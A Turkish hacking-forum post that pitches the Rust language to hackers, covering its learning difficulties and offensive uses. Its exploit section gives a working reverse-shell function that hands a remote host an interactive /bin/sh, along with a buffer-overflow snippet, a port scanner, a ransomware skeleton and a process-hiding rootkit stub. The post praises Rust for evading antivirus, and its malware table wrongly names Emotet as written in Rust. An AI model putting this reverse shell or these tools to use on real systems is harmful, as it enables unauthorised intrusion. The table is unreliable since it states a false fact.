RUST PROGRAMLAMA DİLİ~ Hacker'ın Yeni Gözdesi | Karanlık Yüz | Exploit Geliştirme ~
Merhaba THT ailesi,
Bugün son yılların en popüler sistem programlama dillerinden biri olan Rust'a göz atacağız. Tozlu Raflardan Yükselişi dönemi yaşamış bu dil, güvenlik, performans ve modern programlama anlayışını bir araya getiren Rust, işletim sistemlerinden siber güvenlik araçlarına kadar birçok alanda kullanılmaya başlanmıştır.
Bu konuda Rust'ın temel özelliklerini, avantajlarını, dezavantajlarını ve siber güvenlik dünyasındaki yerini inceleyeceğiz.
───────────────────────────────────────────────────────────────────────────
▶ RUST NEDİR?
───────────────────────────────────────────────────────────────────────────
Rust,
Teknoloji dünyasında bazı diller sessizce doğar, bazıları ise yıllar sonra hak ettiği değeri görür. Rust da tam olarak bu ikinci gruba giren dillerden biri. Uzun süre yalnızca sistem programcılarının ve performans takıntılı geliştiricilerin radarında kalan Rust, bugün işletim sistemlerinden bulut altyapılarına, güvenlik araçlarından gömülü sistemlere kadar birçok alanda adından söz ettirmeyi başarıyor.
Bellek güvenliği, yüksek performans ve modern programlama anlayışını aynı çatı altında buluşturan Rust, son yıllarda yalnızca yazılım geliştiricilerin değil, siber güvenlik araştırmacılarının da dikkatini çekmiş durumda. Kimileri onu C ve C++'ın doğal varisi olarak görürken, kimileri geleceğin sistem programlama dili olarak tanımlıyor.
Bu konuda Rust'ın ne olduğunu, neden bu kadar popüler hale geldiğini, güçlü ve zayıf yönlerini, kullanım alanlarını ve siber güvenlik dünyasındaki yerini detaylı şekilde inceleyeceğiz.
Bellek güvenliği, performans ve eşzamanlılık odaklıdır.
Kod:
fn main() {
println!("Merhaba, Hack Team!");
}───────────────────────────────────────────────────────────────────────────
▶ RUST'IN KARANLIK YÜZÜ
───────────────────────────────────────────────────────────────────────────
ZORLUKLAR: Ownership sistemi, Borrow Checker, Dik öğrenme eğrisi
- Borrow Checker: Yeni başlayanlar için tam bir işkence!
- Derleme Süreleri: Büyük projelerde 5-10 dakika derleme süresi
- Genç Ekosistem: C++'ın 40 yıllık kütüphane birikimi yok
- Unsafe Rust: Çift taraflı kılıç - güçlü ama tehlikeli
Kod:
let x = String::from("hack");
let y = x;
println!("{}", x);───────────────────────────────────────────────────────────────────────────
▶ HACKER'IN GÖZÜNDEN RUST
───────────────────────────────────────────────────────────────────────────
Neden hacker'lar Rust'a geçiyor?
| Özellik | Neden Önemli? |
|---|---|
 Performans | C++ kadar hızlı, Python kadar kolay değil |
 Güvenlik | Kendi araçlarında bellek hatası olmaz |
 Cross-platform | Aynı kod Windows, Linux, macOS'ta çalışır |
 Düşük Detection | Antivirüsler Rust binary'lerini hedeflemiyor (henüz) |
───────────────────────────────────────────────────────────────────────────
▶ EXPLOIT GELİŞTİRME
───────────────────────────────────────────────────────────────────────────
Kod:
unsafe {
let mut buffer = [0u8; 64];
let exploit = vec![0x90; 128];
std::ptr::copy_nonoverlapping(
exploit.as_ptr(),
buffer.as_mut_ptr(),
128
);
}
Kod:
use std::net::TcpStream;
use std::process::Command;
fn reverse_shell(ip: &str, port: u16) {
let stream = TcpStream::connect(format!("{}:{}", ip, port)).unwrap();
Command::new("/bin/sh")
.arg("-i")
.stdin(stream.try_clone().unwrap())
.stdout(stream.try_clone().unwrap())
.stderr(stream)
.spawn()
.unwrap();
}───────────────────────────────────────────────────────────────────────────
▶ RUST İLE YAZILMIŞ MALWARE'LER
───────────────────────────────────────────────────────────────────────────
| İsim | Yıl | Tip |
|---|---|---|
| BlackCat | 2021-2023 | Ransomware |
| Hive | 2022 | Ransomware |
| RansomExx | 2021 | Ransomware |
| Emotet | 2019+ | Modüler Malware |
───────────────────────────────────────────────────────────────────────────
▶ HIZLI PORT TARAYICI
───────────────────────────────────────────────────────────────────────────
Kod:
use rayon::prelude::*;
use std::net::TcpStream;
use std::time::Duration;
fn scan_port(ip: &str, port: u16) -> bool {
TcpStream::connect_timeout(
&format!("{}:{}", ip, port).parse().unwrap(),
Duration::from_millis(50)
).is_ok()
}
let open: Vec<u16> = (1..65535)
.into_par_iter()
.filter(|&p| scan_port("192.168.1.1", p))
.collect();
println!("Açık portlar: {:?}", open);───────────────────────────────────────────────────────────────────────────
▶ RANSOMWARE SİMÜLASYONU
───────────────────────────────────────────────────────────────────────────
Kod:
use walkdir::WalkDir;
use aes_gcm::{Aes256Gcm, Key, Nonce};
fn encrypt_targets(target_dir: &str) {
WalkDir::new(target_dir)
.into_iter()
.filter_map(|e| e.ok())
.filter(|e| e.file_type().is_file())
.for_each(|file| {
});
}───────────────────────────────────────────────────────────────────────────
▶ ROOTKİT / KERNEL MODÜLÜ
───────────────────────────────────────────────────────────────────────────
Kod:
#[no_mangle]
pub fn process_filter(ctx: &mut bpf_context) -> u32 {
let pid = get_current_pid();
if is_hidden(pid) { return 0; }
1
}───────────────────────────────────────────────────────────────────────────
▶ SAVUNMA İÇİN NE YAPMALI?
───────────────────────────────────────────────────────────────────────────
- Dynamic Analysis: Rust binary'lerini çalıştır, hook'la, log tut
- Signature Update: Antivirüs firmaları Rust imzaları eklemeye başladı
- Behavioral Detection: Davranış bazlı tespit şart
- Static Analiz Zor: Rust binary'leri optimize edildiğinde okunması çok zor
───────────────────────────────────────────────────────────────────────────
▶ ÖZET
───────────────────────────────────────────────────────────────────────────
| Soru | Cevap |
|---|---|
| Rust nedir? | Güvenli, hızlı, modern sistem dili |
| Zorluğu? | Öğrenmesi çok zor (ownership/borrowing) |
| Karanlık tarafı? | Unsafe bloklar, genç ekosistem, yavaş derleme |
| Hacker neden kullanır? | Performans + güvenlik + cross-platform + düşük detection |
| Nerede kullanılır? | Malware, ransomware, rootkit, network tool |
───────────────────────────────────────────────────────────────────────────
▶ SON SÖZ
───────────────────────────────────────────────────────────────────────────
"Rust öğrenmek istersen hazırlıklı ol, ilk haftalar borrow checker ile savaşacaksın! Sonra Senior olup Dünyayı sallarsın! Karar SENİN"
Kendi düşüncelerim ve bazı ayrıntı kısımları yazmadım kısa bilgi ve tablo şeklinde yaparak, ayrıca hacker alanında önemli alanların toollarını sizlere örnek olarak yazarak bu dili size sevdirmeyi amaçladım. Umarım beğenirsiniz. Hata ve eksik kısımlarımı mutlaka düzeltmenizi isterim. İyi Okumalar dilerim.
Kaynaklar: The Rust Book | Rust by Example | Awesome Rust Security
═══════════════════════════════════════════════════════════════════════════
Türk Hack Team - Rust Rehberi
Sadece eğitim amaçlıdır! Yasal sorumluluk kullanıcıya aittir.
═══════════════════════════════════════════════════════════════════════════
Hazırlayan: Z10n
SAYGILARIMLA
